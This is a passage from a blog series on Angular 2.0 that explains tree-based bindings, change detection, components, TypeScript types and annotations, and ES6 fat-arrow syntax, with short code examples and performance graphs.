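    <search-bar></search-bar>
    <segmented-button></segmented-button>
    <grid></grid>
  `,
  directives: [SearchBar, SegmentedButton, Grid]
})
class WeatherApp {
}
</code></pre>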
<h2>What is so great about trees?</h2><br />
Trees are very easy to understand, because the relationships between components are instantly obvious. Compare the image of the relationships between bindings in Angular 1.x with the image of the weather app's tree: the relationships in Angular 1.x could quickly get out of control.<br />
<br />
In Angular 2.0 there only exists one type of relationship between two components: A component can either be the parent of the other component, or a child of that component. In that relationship the parent component can send information down to the child component, and the child component can send events back to its parent.<br />
<br />
The relationships between components in Angular 2.0 can be codified as follows:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/bindings-codified.png"><img alt="bindings-codified" class="alignnone wp-image-1301" height="354" src="http://blog.42.nl/wp-content/uploads/2015/07/bindings-codified.png" width="509" /></a><br />
<br />
Having this property makes it very easy to reason about components when you encounter them in a template:<br />
<div title="Page 8"><br />
<pre><code class="javascript"><grid>
<div *for="#station of stations">
<station [station]="station"
(station-changed)="stationsDidChange()">
</station>
</div>
</grid></code></pre><br />
</div><br />
In the template it is immediately clear that the [station] binding comes from the parent, in this case from the Grid's "stations" property. It is also simple to deduce that the "(station-changed)" event calls "stationsDidChange()" on the Grid component, because Grid is the parent of the Station component. In Angular 2.0 you can read a template and instantly understand the relationships between components.<br />
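A hypothetical sketch of the Grid component that would go with that template (the names mirror the template; this is illustrative, not code from the actual weather app):<br />
<pre><code class="javascript">import {Component, View} from 'angular2/angular2';
// Station would be imported from its own file.

@Component({
  selector: 'grid'
})
@View({
  templateUrl: 'grid.html',   // the template shown above
  directives: [Station]
})
class Grid {
  stations: Array<Object>;    // flows down into the [station] binding

  stationsDidChange() {
    // reacts to the (station-changed) event coming up from a child Station
  }
}
</code></pre>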
<br />
The fact that Angular 2.0 applications are trees also influences the way the digest phase works. In 2.0 there is no more need for a digest cycle, because in order for Angular to resolve all the bindings it only needs to go from the top of the tree to the bottom of the tree once.<br />
<br />
The reason for this is simple: a component can only receive data ([] bindings) from its parent component, ergo a child component can only evaluate its bindings when its parent's bindings are resolved. So a child must wait for its parent. A parent cannot receive data from its children, because bindings only go down; this means that a child component's bindings cannot influence the parent. In other words Angular only needs to reach the "bottom" of the tree and it is done.<br />
<br />
Here you can see the contrast between Angular 1.x and Angular 2.0’s change detection visually:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/change-detection-difference.png"><img alt="change-detection-difference" class="alignnone wp-image-1302" height="301" src="http://blog.42.nl/wp-content/uploads/2015/07/change-detection-difference.png" width="563" /></a><br />
<br />
I listed the downsides of Angular 1.x's bindings system as being expensive, unpredictable and unnecessary. Given what we now know about Angular 2.0 you can say its system is not expensive, because there is no digest cycle anymore that can behave suboptimally. The system is now predictable because the flow of data and events is clearly defined, so we humans can reason about it better. But what about "unnecessary": can we stop Angular 2.0 from doing things we know are not needed? Yes we can!<br />
<h2>Change Detection</h2><br />
In Angular 2.0 we can take over the way Angular does change detection on a per component basis. This enables us to squeeze even more performance out of Angular 2.0 when it is absolutely needed.<br />
<br />
By default Angular 2.0 will generate a change detector "class" for each component at runtime. So if you have a component called WeatherStation, Angular 2.0 will generate a WeatherStation_ChangeDetector class. Angular reads the metadata about your component, so all inputs and outputs, and generates a class that will do the dirty checking. This is why you have to state all the inputs and outputs of your components.<br />
<br />
For example if the WeatherStation only has a “temperature” property this class might look something like this:<br />
<pre><code class="javascript">var temperature = obj.temperature;
if (temperature !== this.previousTemperature) {
this.previousTemperature = temperature;
this.weatherStation.temperature = temperature;
}</code></pre><br />
The reason Angular 2.0 generates such a specific “class” for every component is because JavaScript virtual machines (VM) can optimize the hell out of specific “code” way better than they can optimize “generic” code. In very technical terms VMs can optimize monomorphic code better than polymorphic code. <a href="http://mrale.ph/blog/2015/01/11/whats-up-with-monomorphism.html">Here is a great blogpost by Vyacheslav Egorov</a> explaining why this is true. Angular 1.x could not be optimized well by VMs because it used a polymorphic checking algorithm.<br />
<br />
Here's the kicker: you can tell Angular that you want to implement the _ChangeDetector class yourself. This enables us to write immutable components and observable components. In fact the “immutable” behavior comes built in with Angular 2.0.<br />
<br />
To make a component immutable you can do this:<br />
<pre><code class="javascript">@Component({
changeDetector: ON_PUSH
})</code></pre><br />
This means that the @Component will only run change detection when new bindings are pushed into the component. So when the component never receives new bindings it is never part of the digest phase, which means that Angular 2.0 will not waste time checking something that we know will not change.<br />
<br />
The cool thing about being able to set the way change detection works per component is that you can mix and match various strategies. Parts of your application can be immutable, parts can be "default", and some parts can use some exotic strategy you come up with.<br />
<br />
This gives us some powerful tools to prevent Angular from doing “unnecessary” things, which slow our apps down.<br />
<br />
If you come out of this thinking you must declare your own "change detection" algorithm to get the performance boost Angular 2.0 promises, you are wrong. Just the fact that Angular 2.0 applications are trees gives it a boost in performance on its own. You can steer clear of defining your own strategies and it will still be fast; the option is just there when you need it.<br />
<h1>Graph Time</h1><br />
<h2>Speed</h2><br />
By now you want to see a graph showing that Angular 2.0 is faster, so here you go:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Speed.png"><img alt="Speed" class="alignnone size-full wp-image-1305" height="399" src="http://blog.42.nl/wp-content/uploads/2015/07/Speed.png" width="471" /></a><br />
<br />
The graph shows the performance of the same application written in various ways. On the left you see a red bar, which is a baseline application written in vanilla JavaScript. This baseline application is written in the most optimized (but ugly) JavaScript imaginable. It has zero levels of abstraction; every level of abstraction comes with a price in the form of less speed, so it is the fastest way to write an HTML application. The Angular 2.0 team uses this baseline application to see how fast they can get.<br />
<br />
The blue bar on the right represents Angular 1.3: it's 8.58 times slower than the baseline application. Next to that is Angular 2.0 in orange, which represents a "fresh" Angular 2.0 application. Next to that is a "green" bar which represents Angular 2.0 in a "hot" state, which means that it has cached some views.<br />
<br />
As you can see a “fresh” Angular 2.0 is 3 times faster than 1.x. What is even nicer is that the more you click through an Angular 2.0 application the faster it becomes, at least two times faster. Angular 2.0 will provide view caching for you automatically.<br />
<h2>Memory Pressure</h2><br />
The memory Angular 2.0 uses is also down dramatically as seen in this graph:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Memory.png"><img alt="Memory" class="alignnone size-full wp-image-1306" height="399" src="http://blog.42.nl/wp-content/uploads/2015/07/Memory.png" width="471" /></a><br />
<br />
Memory efficiency is increasingly important in the mobile world that we live in; mobile devices do not have as much memory as their desktop cousins. Angular 2.0 prides itself on being a mobile-first framework, so it has to take its memory consumption seriously.<br />
<br />
The Angular 2.0 team announced at the <a href="https://www.youtube.com/watch?v=aHGmj_fqPLE">Angular U conference's keynote</a> that they are not done optimizing yet! So expect even more speed when 2.0 is finally released.<br />
<h1>Want to know more?</h1><br />
Victor Savkin, a core contributor to the Angular project, has some great blogposts about bindings:<br />
• <a href="http://victorsavkin.com/post/114168430846/two-phases-of-angular-2-applications">http://victorsavkin.com/post/114168430846/two-phases-of-angular-2-applications</a><br />
• <a href="http://victorsavkin.com/post/110170125256/change-detection-in-angular-2">http://victorsavkin.com/post/110170125256/change-detection-in-angular-2</a><br />
• <a href="http://victorsavkin.com/post/114168430846/two-phases-of-angular-2-applications">Or you can watch Victor explain it in a twenty minute video.</a><br />
<h1>Conclusion</h1><br />
To make Angular 2.0 faster than ever, the nature of an Angular application had to change from a cyclic graph to a tree. A cyclic graph is by nature very complex: it can point to everything from anything, whereas a tree is nice and simple and only points down. Having a tree makes Angular 2.0 applications easier to reason about. The speed and memory pressure graphs speak for themselves; the Angular team have outdone themselves, and they are not finished yet.<br />
<br />
We have walked the Road to Angular 2.0 now and we have seen most areas in which Angular 2.0 is different from Angular 1.x. What we haven't talked about is how to cross the Rubicon ourselves: how do we migrate our own Angular 1.x applications to Angular 2.0? That is the topic of the final installment of this series.Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-8962763253387334081.post-76157937412061999982015-07-30T14:00:00.000+02:002015-12-29T13:29:57.643+01:00The Road to Angular 2.0 part 4: Components<h1>
Intro</h1>
<br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular5.png"><img alt="theroadtoangular5" class="alignnone size-full wp-image-1186" height="300" src="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular5.png" width="615" /></a><br />
<h1>
Components</h1>
<br />
<a href="http://blog.42.nl/articles/road-angular-2-0-pt-3-types/">Last week we took a look at TypeScript </a>and how it is going to improve our productivity. That combined with the posts about the new template syntax and the post about ES6, gives us a good perspective on how our Angular 2.0 is going to be written.<br />
<br />
This week's post is about Components, and unlike the previous weeks' topics, components change the way we think about our Angular 2.0 applications, not just how we write Angular.<br />
<br />
Let's start by looking at what a component actually is.<br />
<br />
<a name='more'></a><br /><br />
<h1>
What is a component?</h1>
<br />
A component in Angular is defined as a class which has both a Controller and a View. In Angular 2.0 your entire application will consist of Components that work together and build on top of each other.<br />
<br />
Officially an Angular 2.0 component is called a "Component Directive" but we will use the term "Component" because it is used more often.<br />
<br />
This is what a component looks like:<br />
<pre><code class="javascript">import {Component, View} from 'angular2/angular2';
@Component({
selector: 'person'
})
@View({
template: `My name: {{ name }}`
})
class PersonComponent {
name: string;
friends: Array;
constructor(name: string) {
this.name = name;
}
}</code></pre>
<br />
Surprise! You have already seen a complete component in last week's post about Types. A component is a Controller and a View wrapped in a class, so what are the Controller and View in the example above? The answer is that @View is, perhaps unsurprisingly, the View. The Controller is the instance of the PersonComponent, with all the properties and methods that go with it.<br />
<br />
A component also has a @Component annotation. This basically means that a class which has the @View and @Component annotations is a Component.<br />
<h1>
Input / Output</h1>
<br />
A component is very clearly defined in terms of input and output:<br />
every piece of input and output must be explicitly declared. If a component requires a directive, you must explicitly state so and provide that directive. If the component has a specific event you want the rest of the world to know of, you must explicitly declare that event. Here is how I visualize a component:<br />
<div style="text-align: center;">
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Angular-component.png"><img alt="Angular-component" class=" wp-image-1271 aligncenter" height="312" src="http://blog.42.nl/wp-content/uploads/2015/07/Angular-component.png" width="521" /></a></div>
<br />
Let's define what Input and Output mean in the context of Components.<br />
<h2>
Input</h2>
<br />
Let's say we have a component which uses the NgIf directive inside of its template:<br />
<pre><code class="javascript">import {View, NgIf} from 'angular2/angular2';
@View({
template: `My name: {{ name }}`,
directives: [NgIf]
})</code></pre>
<br />
In order for the NgIf to work we must first import NgIf from angular2 itself. Then we must explicitly declare that the @View uses the NgIf directive by adding it to the "directives" property on the @View annotation.<br />
<br />
Another example is a component which has a property that can be bound to inside of a template, for example a "name" property on the person component. In order for this to work:<br />
<pre><code class="javascript"><person [name]="firstName"></person></code></pre>
<br />
We must declare our component like this:<br />
<pre><code class="javascript">import {Component} from 'angular2/angular2';
@Component({
selector: 'person',
properties: { name: 'name' }
})</code></pre>
<br />
So in order for the component to have an HTML property we must define it explicitly beforehand inside of the "properties" object.<br />
<h2>
Output</h2>
<br />
The output of a component, like input, must be explicitly defined as well. For example if we give our PersonComponent an "upvote" event which can be used like this:<br />
<pre><code class="javascript"><person (upvote)="vote()"></person></code></pre>
<br />
We must declare our component like this:<br />
<pre><code class="javascript">import {Component} from 'angular2/angular2';
@Component({
selector: 'person',
  events: ['upvote']
})</code></pre>
<br />
We must add the "upvote" event to the array of "events" within the @Component.<br />
<h1>
Benefits of Components</h1>
<br />
What are the benefits of components as Angular 2.0 describes them?<br />
<br />
The first benefit is that components are easy to reason about, because they are so strictly defined in terms of inputs and outputs. Just by reading the definition of a component it becomes clear what its dependencies are and what events you can subscribe to.<br />
<br />
Having clearly defined components is also great for your text editor and IDE. They can read the definition of your component, and provide you with better autocompletion. But I can also imagine tooling which will analyse your project and tell you which built-in directives you use. In fact the tooling could use that information to strip Angular 2.0 down to the bare core that your application needs.<br />
<br />
Another property that makes components great is that they are composable. You can view components as Lego blocks from which you can build more complex things, such as houses, and from houses you can then make an entire city, and so on. Imagine a trashcan button with an "are you sure" message: you can use that throughout many components in your application.<br />
<br />
Components can also be reused quite easily, because they are isolated. Take the trashcan button, for example: it can easily be copied from project A to another project B. Figuring out what the dependencies of the trashcan button are is as simple as looking at its definition.<br />
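Such a trashcan button might look roughly like this, following the alpha syntax shown earlier in this post (the selector, property and event names are made up for illustration):<br />
<pre><code class="javascript">import {Component, View} from 'angular2/angular2';

@Component({
  selector: 'trashcan-button',
  properties: { label: 'label' },
  events: ['confirmed']
})
@View({
  template: `<button (click)="ask()">{{ label }}</button>`
})
class TrashcanButton {
  label: string;

  ask() {
    // show the "are you sure" message, and emit the 'confirmed'
    // event when the user agrees
  }
}
</code></pre>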
<h1>
Origin Story</h1>
<br />
Every hero needs a good origin story. The origin of the Component Directive lies in two APIs from Angular 1.x: the directive API and the Controller API. These two APIs had some overlapping use cases:<br />
<div style="text-align: center;">
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Directive-controller-overlap.jpg"><img alt="Directive-controller-overlap" class=" wp-image-1274 aligncenter" height="256" src="http://blog.42.nl/wp-content/uploads/2015/07/Directive-controller-overlap.jpg" width="590" /></a></div>
<br />
<div style="text-align: center;">
</div>
<br />
Many of the use cases for a controller you could implement with directives instead; the inverse is also true, many of the use cases for a directive you could implement with a controller. If you have ever taught Angular 1.x to someone you will often get the question: how do I decide when to use a controller or a directive? This question is very difficult to answer.<br />
<br />
But as it turns out the developers of Angular 1.x really wanted us to use directives a lot more than they wanted us to use controllers. I think that the reason people gravitate to controllers is that most of us come from a traditional MVC background such as Spring MVC or Rails. This makes you naturally inclined to use "controllers", since that is what you know best.<br />
<br />
So to solve the problem of having two competing APIs and to guide people to using directives, they merged the two APIs into one API to rule them all: the Component Directive.<br />
<br />
When you hear that the controller and directive APIs are dead, you now know that they live on in their love child: the Component Directive.<br />
<h1>
Conclusion</h1>
<br />
Components give us a fundamental new way to build Angular applications, in a composable and reusable way. Components will be the bread and butter of Angular 2.0 applications.<br />
<br />
<a href="http://blog.42.nl/articles/road-angular-2-0-pt-5-bindings/">Next week we will look at "bindings" in Angular 2.0</a>: how multiple components team up to form Angular 2.0 applications, and how information and events flow between components. Then you will understand why angular 2.0 is 3x to 10x faster than an Angular 1.x application!Anonymousnoreply@blogger.com4tag:blogger.com,1999:blog-8962763253387334081.post-32529859402003041402015-07-23T14:00:00.000+02:002016-02-25T12:55:58.795+01:00The Road to Angular 2.0 part 3: Types<h1>Intro</h1><br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x. This series of blogposts is a follow up to that presentation. <a href="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular4.png"><img alt="theroadtoangular4" class="alignnone size-full wp-image-1185" height="300" src="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular4.png" width="615" /></a><br />
<h1>Types</h1><br />
Last <a href="http://blog.42.nl/articles/the-road-to-angular-2-0-pt2-es6/">week we looked at ES6</a>, the next version of JavaScript, and how it is going to change the way we write our Angular 2.0 code. However ES6 was not enough for the Angular 2.0 team. They wanted to add types and annotations to JavaScript. So what the Angular team did was create their own language, called AtScript, which included types and annotations and compiled down to JavaScript. Microsoft was also working on a language with types which transpiles back to ES5. That language is called TypeScript, and it has been in development since 2012. The only thing TypeScript missed, according to the Angular 2.0 team, was annotations. So the two teams got together and the Angular team convinced the TypeScript folks to add annotations. Now there was no more need for AtScript, and it was abandoned in favor of TypeScript. Why create your own language when there is already a better alternative?<br />
<br />
<a name='more'></a><br />
<br />
<h1>TypeScript</h1><br />
<a href="http://www.typescriptlang.org/">TypeScript</a> is a superset of JavaScript, this means that all valid ES5 is valid TypeScript code. This means you can copy and paste the JS you write today and paste it in a TypeScript file and it will just work. Of course TypeScript also adds functionality such as types and annotations that do not have an equivalent in JavaScript. Hence not all valid TypeScript is valid JavaScript. Visually TypeScript looks something like this:<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/07/TypeScript.jpg"><img alt="TypeScript" class=" wp-image-1228 aligncenter" height="363" src="http://blog.42.nl/wp-content/uploads/2015/07/TypeScript.jpg" width="362" /></a></div><br />
TypeScript is a superset of ES5 and wraps ES6, so you can use all ES6 features; on top of that it adds types and annotations.<br />
<h1>Types</h1><br />
In TypeScript you can add static types to JavaScript code. Consider the following example:<br />
<pre><code class="javascript">function greeter(name: string) : string {
return "hi there " + name;
}
greeter('Maarten'); // Hi there Maarten</code></pre><br />
As you can see, the 'name' parameter of the greeter function is of type string. The return value of the greeter function is a string as well. Trying to give a number to the greeter function results in a type error at compile time:<br />
<pre><code class="javascript">greeter(10); // error: Argument of type 'number' is not assignable to parameter of type 'string'.</code></pre><br />
Types are not limited to primitives; you can also use 'classes' as types:<br />
<pre><code class="javascript">class Person {
name: string;
age: number;
constructor(name: string, age: number) {
this.name = name;
this.age = age;
}
}
var maarten = new Person('Maarten', 26);
var jarno = new Person('Jarno', 55);
var eric = new Person('Eric', 14);
var persons: Array<Person> = [maarten, jarno, eric];</code></pre><br />
In the above example you can see how the array named 'persons' only accepts objects of type 'Person'. This is basically how generics work in C#, Java and other strongly typed languages.<br />
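For example, here is a small sketch building on the code above: the type on the parameter lets the compiler verify that only Person objects are passed in (the averageAge function is made up for illustration).<br />
<pre><code class="javascript">function averageAge(persons: Array<Person>): number {
  var total = 0;
  persons.forEach((person) => total += person.age);
  return total / persons.length;
}
console.log(averageAge(persons).toFixed(1)); // prints 31.7
// averageAge(['Maarten']); // compile error: a string[] is not assignable to Array<Person></code></pre><br />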
<h1>Annotations</h1><br />
One of the reasons for the Angular team to stop working on AtScript is that TypeScript 1.5 promised to include annotations. Let's dive into what annotations can do by looking at some Angular 2.0 code:<br />
<pre><code class="javascript">import {Component, View} from 'angular2/angular2';
@Component({
selector: 'person'
})
@View({
template: `<p>My name: {{ name }}</p>`
})
class PersonComponent {
name: string;
friends: Array<string>;
constructor(name: string) {
this.name = name;
}
}</code></pre><br />
Annotations are always prefixed with the @ symbol. This means that in the code above there are two annotations: @Component and @View. Note that you can also define your own annotations if you want to: @Component and @View are not "built" into TypeScript, they were created by the Angular team. What an annotation does is decorate a class with extra functionality in a very succinct way: with very little code you can add a great deal of functionality. Let's look at the @Component and @View annotations from the example above to demonstrate this.<br />
<h2>@Component</h2><br />
@Component tells Angular how it should recognize a component. In this case that it should recognize a PersonComponent whenever it sees an HTML element called person. So if you have the following code inside of a HTML template:<br />
<pre><code class="javascript"><person></person></code></pre><br />
Angular will instantiate a PersonComponent.<br />
<h2>@View</h2><br />
The @View annotation tells Angular what the template for a particular component is. In the case of the code snippet that defined a PersonComponent, the template is an HTML paragraph (<p>) with a binding to 'name'. Note that you could also put your template in a separate file and use templateUrl to retrieve the template, just like you could do in Angular 1.x.<br />
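As noted above, @Component and @View are not built into TypeScript, and you can define annotations of your own. Here is a minimal sketch of what that could look like; the @Entity annotation and its behaviour are made up for illustration, and it assumes decorator support is enabled in the TypeScript compiler:<br />
<pre><code class="javascript">// A hypothetical @Entity annotation: just a function that receives the decorated
// class and attaches some metadata to it.
function Entity(options: { tableName: string }) {
  return function(target: any) {
    target.tableName = options.tableName;
  };
}

@Entity({ tableName: 'books' })
class Book {
  static tableName: string; // filled in by the @Entity annotation
  constructor(public title: string) {}
}

console.log(Book.tableName); // prints 'books'</code></pre><br />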
<h1>Benefits of Types</h1><br />
We have now seen some TypeScript in action, including static types and annotations. But what makes ‘types’ so great? After all, we have been using JavaScript for years without them. So why add types now?<br />
<h2>IDE and text editors love types</h2><br />
The more static information you provide an IDE the better it can help you write your code. Static types enable better autocompletion, better refactoring support and better code navigation. For example: when your editor sees you writing a function and it knows that it takes two numbers and returns a string, it can show a popup window with that information:<br />
<div style="text-align: center;"><img alt="typescript-typehint" class="size-full wp-image-1232 aligncenter" height="49" src="http://blog.42.nl/wp-content/uploads/2015/07/typescript-typehint.png" style="line-height: 1.5em;" width="494" /></div><br />
For the TypeScript team this extra productivity gain is very important. They even provide ways to autocomplete code that was not written in TypeScript. They do this by creating files that annotate other open source libraries or frameworks by defining TypeScript <a href="http://www.typescriptlang.org/Handbook#interfaces">interfaces </a>for them. These files have the .d.ts extension, where ts stands for TypeScript and .d. for definition, and can be used to make your life easier. There is even a GitHub repository with high quality .d.ts files: <a href="https://github.com/borisyankov/definitelytyped">https://github.com/borisyankov/DefinitelyTyped</a><br />
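To give you an idea of what such a definition file looks like, here is a minimal, made-up example; real, much larger definition files for popular libraries can be found in the DefinitelyTyped repository mentioned above:<br />
<pre><code class="javascript">// greeter.d.ts -- a hypothetical definition file for a plain JavaScript library called 'greeter'.
// It contains no implementation, only the type information editors and the compiler can use.
declare module "greeter" {
  interface GreeterOptions {
    loud?: boolean;
  }
  export function greet(name: string, options?: GreeterOptions): string;
}</code></pre><br />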
<h2>Types help you show your intent</h2><br />
Types are not only useful for IDEs; you, the human programmer, benefit from them as well. Having type information makes it easier to reason about other people’s code, and even your own code three months down the line.<br />
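As a small illustration (the function and the Customer class are made up), compare an untyped and a typed version of the same function:<br />
<pre><code class="javascript">class Customer {
  constructor(public name: string, public yearsActive: number) {}
}

// Without type information the reader has to guess what 'customer' is and what comes back:
function loyaltyDiscountUntyped(customer) {
  return customer.yearsActive > 5 ? 0.1 : 0;
}

// With types the intent is part of the signature:
function loyaltyDiscount(customer: Customer): number {
  return customer.yearsActive > 5 ? 0.1 : 0;
}

console.log(loyaltyDiscount(new Customer('Maarten', 7))); // prints 0.1</code></pre><br />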
<h1>Is TypeScript required?</h1><br />
TypeScript is not required by Angular 2.0: you can still write ES5, ES6 or even Dart and never use TypeScript at all. This is also what the official docs at <a href="https://angular.io/">angular.io</a> say; in fact they show ES5 examples next to every TypeScript example. That being said, I think writing ES5 or ES6 is not going to be feasible, because every tutorial on Angular 2.0 is simply going to assume you use TypeScript. So if you insist on using ES5 or ES6, you will constantly have to rewrite TypeScript examples from the web back to ES5 or ES6 yourself.<br />
<br />
I think it is best that you bite the bullet and use TypeScript. But since TypeScript is a superset of JavaScript you can choose when to use TypeScript and when to use pure JavaScript. You can mix and match as you please, this is especially handy when migrating from Angular 1.x to 2.0, but more on that in a later blog post.<br />
<h1>In what language is Angular 2.0 written?</h1><br />
Ever wonder why Angular 1.x is called AngularJS and Angular 2.0 is just Angular 2.0, sans the JS? That is because Angular is no longer just a JavaScript framework; instead it supports multiple languages. Angular 2.0 will support ES6, ES5, TypeScript and Dart. Dart is a language by Google that was supposed to supplant JavaScript as the scripting language of the browser. Recently Google <a href="http://news.dartlang.org/2015/03/dart-for-entire-web.html">announced</a> they will not add Dart to Chrome but will transpile Dart to JavaScript instead. So what do they write Angular 2.0 itself in? The answer is TypeScript, but they have Dart and JS facades that help compile Angular 2.0 to JS and Dart versions. Here is an infographic from the Angular 2.0 team that shows how that works:<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/07/Angular-2.0-pipeline.png"><img alt="Angular 2.0 pipeline" class="size-full wp-image-1234 aligncenter" height="512" src="http://blog.42.nl/wp-content/uploads/2015/07/Angular-2.0-pipeline.png" width="666" /></a></div><br />
You can read the graph as follows: Angular 2.0 is programmed in TypeScript (far left) and there are two facades, one for JavaScript and one for Dart. The purpose of these facades is to make it possible to offer idiomatic APIs for both JS and Dart. This means that both languages get Angular's API in a form that is best suited for that language. From there the <a href="https://github.com/google/traceur-compiler">traceur</a> compiler outputs JavaScript and Dart versions of the framework.<br />
<br />
When you write Angular 2.0 in Dart you write your application with Dart, using the Dart Angular API facade. This is what the two yellow 'Dart' blocks represent in the lower part of the graph.<br />
<br />
When you choose to write your Angular 2.0 code in JavaScript you can choose between ES5, ES6 and TypeScript. But you will use the JavaScript API for all three of them. This is what the blue 'JS' part in the top part of the graph represents.<br />
<h1>One CLI (hopefully) to rule them all</h1><br />
A colleague of mine asked me while he was reviewing this blogpost: "What do I have to do to use TypeScript in Angular 2.0?". Which is a valid question: after all, we have seen these complex graphs with all these facades, but we have no idea how to use any of it in our projects.<br />
<br />
The answer is that there is <strong>no</strong> answer yet on how to best build an Angular 2.0 project. But there is hope: the Angular team got together with the React team to discuss common ground, and in the <a href="https://docs.google.com/document/d/1QZxArgMwidgCrAbuSikcB2iBxkffH6w0YB0C1qCsuH0/edit?pli=1">notes</a> Igor from the Angular team discusses the need for a Command Line Interface (CLI). He states that the Angular team is building a CLI that will, and I quote:<br />
<ol><li>Scaffold.</li>
<li>Skeleton files</li>
<li>Set up build</li>
<li>Set up testing environment</li>
</ol><br />
By "Scaffold" I think Igor means generating entire base Angular projects, and by "Skeleton files" generating very specific files such as unit test, e2e test and services. "Set up build" probably mean setting up TypeScript, Dart, ES5 or ES6 depending on the language that you choose. "Set up testing environment" means that it will setup karma and protractor for unit and e2e tests.<br />
<br />
The Angular 2.0 team took a page from the <a href="http://emberjs.com/">Ember</a> playbook, because Ember has had a <a href="http://www.ember-cli.com/">CLI</a> for quite some time. The effect of having a CLI with first class support, created by the Ember team itself, is that every Ember application out there uses the same infrastructure to build Ember applications. Plus the Ember build system supports <a href="http://www.emberaddons.com/">plugins</a>, built on top of the 'default' CLI. This makes for a very powerful, standardised way to build Ember applications. Having a big community that uses the same tools makes these tools better.<br />
<br />
From the meeting notes it is clear that the Angular team is working with the Ember guys to kickstart their own CLI:<br />
<blockquote>We’re working with the Ember CLI team who are extracting reusable bits. Working with Joe from broccoli and reusing those bits. Current changing the Angular build from gulp to broccoli. Working with the NPM team on package management and resolution. The package managers that exist today aren’t good, but NPM is the closest of all of them.</blockquote><br />
How this CLI will work exactly is currently still unknown; when more information becomes available, expect an update from me. That being said, I think the Angular CLI is a very positive development for us, the Angular community.<br />
<h1>Want to know more?</h1><br />
TypeScript adds a lot more functionality on top of JavaScript which I have not covered in this blogpost. Here are some TypeScript resources:<br />
<ul><li><a href="http://www.typescriptlang.org/Handbook">The official TypeScript handbook</a></li>
<li><a href="http://www.typescriptlang.org/Content/TypeScript%20Language%20Specification.pdf">The 1.4 specs (note that annotations come in 1.5), for when you really want to get down and dirty.</a></li>
<li><a href="http://www.typescriptlang.org/Playground">The TypeScript playground, here you can interactively try out TypeScript in the browser</a></li>
</ul><br />
<h1>Conclusion</h1><br />
TypeScript was included into Angular 2.0 to allow us to statically define types, which help us write more readable code. TypeScript also includes annotations which allows us to write very little code but achieve much. It gives our IDEs type information to help us be more productive by providing better autocompletion.<br />
<br />
So even though you are not forced to use TypeScript I definitely recommend that you do.<br />
<br />
We've also seen that Angular 2.0 is no longer a pure "JavaScript" framework but that it supports multiple languages: JavaScript (ES6, and ES5), TypeScript and Dart. The new "CLI" will hopefully make it easy to setup Angular 2.0 projects in a way that the whole Angular community can benefit from it.<br />
<br />
In previous weeks and this weeks we have been looking at some mechanical changes in Angular. Things that simply change the way we write Angular, <a href="/2015/07/the-road-to-angular-20-part-4-components.html">next week we are going to look at components</a>, which will change the way we think about Angular.Anonymousnoreply@blogger.com4tag:blogger.com,1999:blog-8962763253387334081.post-77529229440300016522015-07-16T14:23:00.000+02:002015-12-29T13:33:45.392+01:00The Road to Angular 2.0 part 2: ES6<h1>
Intro</h1>
<br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<br />
<img alt="theroadtoangular3" class="alignnone size-full wp-image-1183" height="300" src="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular3.png" style="line-height: 1.5em;" width="615" /><br />
<h1>
ES6</h1>
<br />
<a href="http://blog.42.nl/articles/the-road-to-angular-2-0-pt1-template-syntax/">Last week we discussed the new template syntax in Angular 1.x</a>. This week it is time to discus ES6 and how it affects Angular 2.0.<br />
<br />
ECMAScript 6 is the next version of JavaScript. The specs have been frozen and now it is up to the browser vendors to implement them. ES6 brings us some exciting new features. Let's take a whirlwind tour and look at some of them.<br />
<br />
<a name='more'></a><br /><br />
<h1>
Whirlwind tour</h1>
<br />
<h2>
Fat Arrows</h2>
<br />
JavaScript is becoming more 'functional' in each iteration. ES5 added: <a href="https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/map">map</a>, <a href="https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/reduce">reduce</a>, <a href="https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/filter">filter</a> and more. These functions take other functions as arguments. The functions that are passed in as arguments become less readable when they are inlined. For example this is quite verbose:<br />
<pre><code class="javascript">var doubled = [1, 2, 3, 4, 5].map(function(x) {
return x * x;
};</code></pre>
<br />
With ES6's 'fat arrow' notation, writing lambda expressions (anonymous functions) becomes really easy:<br />
<pre><code class="javascript">var doubled = [1, 2, 3, 4, 5].map((x) => x * 2);</code></pre>
<br />
The fat arrow was created to allow us to write really short function definitions. Let's look at and break down another example:<br />
<pre><code class="javascript">var square = x => x * x;
console.log(square(5)); // -> 25</code></pre>
<br />
Here you can see the function 'square' being defined as: x => x * x. What this says is: define a function with one parameter called x, which evaluates to x * x. The value of the expression is implicitly the return value, so there is no need for a return statement.<br />
<br />
You can also define functions which take multiple parameters like so:<br />
<pre><code class="javascript">var add = (a, b) => a + b;
